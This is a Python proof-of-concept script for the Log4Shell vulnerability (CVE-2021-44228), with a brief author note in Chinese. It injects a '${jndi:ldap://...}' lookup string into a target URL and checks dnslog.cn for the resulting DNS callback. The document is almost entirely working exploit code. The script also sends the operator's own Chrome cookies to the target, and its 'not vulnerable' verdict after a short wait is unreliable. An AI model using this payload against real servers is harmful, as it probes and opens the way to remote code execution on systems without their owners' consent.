Poc_CVE-2021-44228
import requests
from selenium.webdriver import Chrome
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.by import By
import time
import urllib.parse
import browser_cookie3


def jndi(dns: str) -> str:
    """Build the ``payload=`` query string for a CVE-2021-44228 DNS-callback probe.

    The Log4j lookup template ``${jndi:ldap://<dns>/exp}`` is percent-encoded
    and ``<dns>`` (the DNSLog sub-domain obtained in ``__main__``) is spliced
    into the middle of it.  The probe only triggers an outbound name lookup
    for ``dns``; it does not carry any further instructions.

    Args:
        dns: callback host name; coerced with ``str()``.

    Returns:
        ``'payload=' + <url-encoded lookup string>``.
    """
    dns = str(dns)
    pay1 = '${jndi:ldap://'
    pay2 = '/exp}'
    # Only the two template fragments are quoted; `dns` is inserted as-is,
    # so a host name with characters needing escaping would not be encoded.
    pay_url1 = urllib.parse.quote(pay1)
    pay_url2 = urllib.parse.quote(pay2)
    pay_url = pay_url1 + dns +pay_url2
    payload = 'payload='+str(pay_url)
    return (payload)

def verify(dns: str) -> None:
    """Check the DNSLog page for a record containing ``dns`` and print a verdict.

    Reads the module-global ``driver`` (the Chrome session created under
    ``__main__``); calling this function from anywhere else raises
    ``NameError``.  The XPaths below are tied to the current dnslog.cn page
    layout and break if that site changes.

    Args:
        dns: the sub-domain whose appearance in the record table counts as
            a hit.
    """
    # Fixed waits rather than an explicit wait on the table; a callback that
    # arrives after the second sleep is simply missed.
    time.sleep(5)
    # presumably the "Refresh Record" control — TODO confirm against the page
    driver.find_element(By.XPATH, '//*[@id="content"]/button[2]').click()
    time.sleep(5)
    # Second row, first cell of the records table.
    ver = driver.find_element(By.XPATH, '//*[@id="myRecords"]/tbody/tr[2]/td[1]')
    # NOTE: `re` here is a plain local holding the expected sub-domain; it
    # shadows the name of the stdlib regex module (not imported in this file).
    re = dns
    flag = re in str(ver.text)

    # A negative result after only ~10 s is not conclusive evidence that the
    # target is patched; it only means no record had appeared yet.
    if flag:
        print("It looks likely vulnerable")
    else:
        print("It is strong")

def exploit(url: str, dns: str) -> None:
    """Send one GET to ``<url>/hello?payload=...`` and then call ``verify``.

    Args:
        url: scheme-prefixed target, e.g. ``http://127.0.0.1:80``.
        dns: DNSLog sub-domain passed through to :func:`jndi` and
            :func:`verify`.
    """
    # NOTE(review): this loads the operator's own cookies from the local
    # Chrome profile and sends every one of them to the target host.  Nothing
    # in the probe requires them; a throwaway profile or an empty cookie jar
    # would avoid disclosing real session cookies to an arbitrary server.
    cookie = browser_cookie3.chrome()
    payload = url+'/hello?'+jndi(dns)
    response = requests.get(url=payload,cookies=cookie)
    print(response.text)
    verify(dns)

if __name__ == '__main__':
    # Target is taken verbatim from the prompt; no validation of the value.
    url = 'http://' + input('Please input your ip:port(such as--127.0.0.1:80):')
    # `driver` is a module-level global that `verify` depends on.
    driver = Chrome()
    driver.get("http://www.dnslog.cn/")
    WebDriverWait(driver, 10).until(lambda d: "DNSLog" in d.title)
    # presumably the "Get SubDomain" button — TODO confirm against the page
    driver.find_element(By.XPATH, '//*[@id="content"]/button[1]').click()
    time.sleep(5)
    # The freshly issued sub-domain is read from the page text.
    dns = driver.find_element(By.XPATH, '//*[@id="myDomain"]')

    exploit(url,dns.text)
鄙人才疏学浅（再加上没有申请个人域名，毕竟太贵），该 PoC 仅限用于安装了 Chrome 的 Windows 系统，并不支持 Linux 等。如果有可用域名的话，将 verify 里的内容改为对该域名的访问，然后修改一下 main 函数，即可同样用于 Linux。